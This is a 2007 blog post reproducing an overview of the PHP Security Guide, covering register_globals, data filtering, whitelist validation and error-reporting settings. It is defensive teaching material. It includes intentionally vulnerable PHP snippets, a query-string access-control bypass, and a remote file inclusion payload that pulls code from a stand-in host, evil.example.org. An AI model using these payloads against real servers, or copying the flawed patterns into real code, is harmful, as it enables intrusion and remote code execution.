Looking For Something ?

Google

Thursday, December 6, 2007

PHP Security Guide: Overview

What Is Security?

*

Security is a measurement, not a characteristic.

It is unfortunate that many software projects list security as a simple requirement to be met. Is it secure? This question is as subjective as asking if something is hot.
*

Security must be balanced with expense.

It is easy and relatively inexpensive to provide a sufficient level of security for most applications. However, if your security needs are very demanding, because you're protecting information that is very valuable, then you must achieve a higher level of security at an increased cost. This expense must be included in the budget of the project.
*

Security must be balanced with usability.

It is not uncommon that steps taken to increase the security of a web application also decrease the usability. Passwords, session timeouts, and access control all create obstacles for a legitimate user. Sometimes these are necessary to provide adequate security, but there isn't one solution that is appropriate for every application. It is wise to be mindful of your legitimate users as you implement security measures.
*

Security must be part of the design.

If you do not design your application with security in mind, you are doomed to be constantly addressing new security vulnerabilities. Careful programming cannot make up for a poor design.

Basic Steps

*

Consider illegitimate uses of your application.

A secure design is only part of the solution. During development, when the code is being written, it is important to consider illegitimate uses of your application. Often, the focus is on making the application work as intended, and while this is necessary to deliver a properly functioning application, it does nothing to help make the application secure.
*

Educate yourself.

The fact that you are here is evidence that you care about security, and as trite as it may sound, this is the most important step. There are numerous resources available on the web and in print, and several resources are listed in the PHP Security Consortium's Library at http://phpsec.org/library/.
*

If nothing else, FILTER ALL EXTERNAL DATA.

Data filtering is the cornerstone of web application security in any language and on any platform. By initializing your variables and filtering all data that comes from an external source, you will address a majority of security vulnerabilities with very little effort. A whitelist approach is better than a blacklist approach. This means that you should consider all data invalid unless it can be proven valid (rather than considering all data valid unless it can be proven invalid).

Register Globals

The register_globals directive is disabled by default in PHP versions 4.2.0 and greater. While it does not represent a security vulnerability, it is a security risk. Therefore, you should always develop and deploy applications with register_globals disabled.

Why is it a security risk? Good examples are difficult to produce for everyone, because it often requires a unique situation to make the risk clear. However, the most common example is that found in the PHP manual:


if (authenticated_user())
{
$authorized = true;
}

if ($authorized)
{
include '/highly/sensitive/data.php';
}

?>

With register_globals enabled, this page can be requested with ?authorized=1 in the query string to bypass the intended access control. Of course, this particular vulnerability is the fault of the developer, not register_globals, but this indicates the increased risk posed by the directive. Without it, ordinary global variables (such as $authorized in the example) are not affected by data submitted by the client. A best practice is to initialize all variables and to develop with error_reporting set to E_ALL, so that the use of an uninitialized variable won't be overlooked during development.

Another example that illustrates how register_globals can be problematic is the following use of include with a dynamic path:


include "$path/script.php";

?>

With register_globals enabled, this page can be requested with ?path=http%3A%2F%2Fevil.example.org%2F%3F in the query string in order to equate this example to the following:


include 'http://evil.example.org/?/script.php';

?>

If allow_url_fopen is enabled (which it is by default, even in php.ini-recommended), this will include the output of http://evil.example.org/ just as if it were a local file. This is a major security vulnerability, and it is one that has been discovered in some popular open source applications.

Initializing $path can mitigate this particular risk, but so does disabling register_globals. Whereas a developer's mistake can lead to an uninitialized variable, disabling register_globals is a global configuration change that is far less likely to be overlooked.

The convenience is wonderful, and those of us who have had to manually handle form data in the past appreciate this. However, using the $_POST and $_GET superglobal arrays is still very convenient, and it's not worth the added risk to enable register_globals. While I completely disagree with arguments that equate register_globals to poor security, I do recommend that it be disabled.

In addition to all of this, disabling register_globals encourages developers to be mindful of the origin of data, and this is an important characteristic of any security-conscious developer.
Data Filtering

As stated previously, data filtering is the cornerstone of web application security, and this is independent of programming language or platform. It involves the mechanism by which you determine the validity of data that is entering and exiting the application, and a good software design can help developers to:

*

Ensure that data filtering cannot be bypassed,
*

Ensure that invalid data cannot be mistaken for valid data, and
*

Identify the origin of data.

Opinions about how to ensure that data filtering cannot be bypassed vary, but there are two general approaches that seem to be the most common, and both of these provide a sufficient level of assurance.
The Dispatch Method

One method is to have a single PHP script available directly from the web (via URL). Everything else is a module included with include or require as needed. This method usually requires that a GET variable be passed along with every URL, identifying the task. This GET variable can be considered the replacement for the script name that would be used in a more simplistic design. For example:

http://example.org/dispatch.php?task=print_form

The file dispatch.php is the only file within document root. This allows a developer to do two important things:

*

Implement some global security measures at the top of dispatch.php and be assured that these measures cannot be bypassed.
*

Easily see that data filtering takes place when necessary, by focusing on the control flow of a specific task.

To further explain this, consider the following example dispatch.php script:


/* Global security measures */

switch ($_GET['task'])
{
case 'print_form':
include '/inc/presentation/form.inc';
break;

case 'process_form':
$form_valid = false;
include '/inc/logic/process.inc';
if ($form_valid)
{
include '/inc/presentation/end.inc';
}
else
{
include '/inc/presentation/form.inc';
}
break;

default:
include '/inc/presentation/index.inc';
break;
}

?>

If this is the only public PHP script, then it should be clear that the design of this application ensures that any global security measures taken at the top cannot be bypassed. It also lets a developer easily see the control flow for a specific task. For example, instead of glancing through a lot of code, it is easy to see that end.inc is only displayed to a user when $form_valid is true, and because it is initialized as false just before process.inc is included, it is clear that the logic within process.inc must set it to true, otherwise the form is displayed again (presumably with appropriate error messages).

Note
If you use a directory index file such as index.php (instead of dispatch.php), you can use URLs such as http://example.org/?task=print_form.

You can also use the Apache ForceType directive or mod_rewrite to accommodate URLs such as http://example.org/app/print-form.

The Include Method

Another approach is to have a single module that is responsible for all security measures. This module is included at the top (or very near the top) of all PHP scripts that are public (available via URL). Consider the following security.inc script:


switch ($_POST['form'])
{
case 'login':
$allowed = array();
$allowed[] = 'form';
$allowed[] = 'username';
$allowed[] = 'password';

$sent = array_keys($_POST);

if ($allowed == $sent)
{
include '/inc/logic/process.inc';
}

break;
}

?>

In this example, each form that is submitted is expected to have a form variable named form that uniquely identifies it, and security.inc has a separate case to handle the data filtering for that particular form. An example of an HTML form that fulfills this requirement is as follows:



Username:


Password:





An array named $allowed is used to identify exactly which form variables are allowed, and this list must be identical in order for the form to be processed. Control flow is determined elsewhere, and process.inc is where the actual data filtering takes place.

Note
A good way to ensure that security.inc is always included at the top of every PHP script is to use the auto_prepend_file directive.

Filtering Examples

It is important to take a whitelist approach to your data filtering, and while it is impossible to give examples for every type of form data you may encounter, a few examples can help to illustrate a sound approach.

The following validates an email address:


$clean = array();

$email_pattern = '/^[^@\s<&>]+@([-a-z0-9]+\.)+[a-z]{2,}$/i';

if (preg_match($email_pattern, $_POST['email']))
{
$clean['email'] = $_POST['email'];
}

?>

The following ensures that $_POST['color'] is red, green, or blue:


$clean = array();

switch ($_POST['color'])
{
case 'red':
case 'green':
case 'blue':
$clean['color'] = $_POST['color'];
break;
}

?>

The following example ensures that $_POST['num'] is an integer:


$clean = array();

if ($_POST['num'] == strval(intval($_POST['num'])))
{
$clean['num'] = $_POST['num'];
}

?>

The following example ensures that $_POST['num'] is a float:


$clean = array();

if ($_POST['num'] == strval(floatval($_POST['num'])))
{
$clean['num'] = $_POST['num'];
}

?>

Naming Conventions

Each of the previous examples make use of an array named $clean. This illustrates a good practice that can help developers identify whether data is potentially tainted. You should never make a practice of validating data and leaving it in $_POST or $_GET, because it is important for developers to always be suspicious of data within these superglobal arrays.

In addition, a more liberal use of $clean can allow you to consider everything else to be tainted, and this more closely resembles a whitelist approach and therefore offers an increased level of security.

If you only store data in $clean after it has been validated, the only risk in a failure to validate something is that you might reference an array element that doesn't exist rather than potentially tainted data.
Timing

Once a PHP script begins processing, the entire HTTP request has been received. This means that the user does not have another opportunity to send data, and therefore no data can be injected into your script (even if register_globals is enabled). This is why initializing your variables is such a good practice.
Error Reporting

In versions of PHP prior to PHP 5, released 13 Jul 2004, error reporting is pretty simplistic. Aside from careful programming, it relies mostly upon a few specific PHP configuration directives:

*

error_reporting

This directive sets the level of error reporting desired. It is strongly suggested that you set this to E_ALL for both development and production.
*

display_errors

This directive determines whether errors should be displayed on the screen (included in the output). You should develop with this set to On, so that you can be alerted to errors during development, and you should set this to Off for production, so that errors are hidden from the users (and potential attackers).
*

log_errors

This directive determines whether errors should be written to a log. While this may raise performance concerns, it is desirable that errors are rare. If logging errors presents a strain on the disk due to the heavy I/O, you probably have larger concerns than the performance of your application. You should set this directive to On in production.
*

error_log

This directive indicates the location of the log file to which errors are written. Make sure that the web server has write privileges for the specified file.

Having error_reporting set to E_ALL will help to enforce the initialization of variables, because a reference to an undefined variable generates a notice.

Note
Each of these directives can be set with ini_set(), in case you do not have access to php.ini or another method of setting these directives.

A good reference on all error handling and reporting functions is in the PHP manual:

http://www.php.net/manual/en/ref.errorfunc.php

PHP 5 includes exception handling. For more information, see:

http://www.php.net/manual/language.exceptions.php